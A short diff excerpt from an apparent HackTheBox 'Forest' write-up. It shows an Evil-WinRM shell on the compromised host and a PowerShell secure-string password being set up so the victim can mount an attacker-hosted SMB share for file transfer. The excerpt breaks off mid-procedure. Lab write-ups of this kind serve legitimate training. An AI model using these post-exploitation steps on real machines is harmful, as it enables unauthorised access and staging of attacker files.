zeeshan1991k/HackTheBox/Forest_Retired/50 - Uploading files to forest machine via smbserver.md

 [*] Config file parsed
 [*] Config file parsed
 ```
-Then ran following commands on victim(forest machine).
+Then ran following commands on victim(forest machine) so that we  can access `smb` folder on kali as `clark` folder on victim(forest machine) as smb share of new user created `clark` with share folder `clark`.
 ```powershell
 *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $pass = convertto-securestring 'clark1234' -AsPlainText -Force
 *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $pass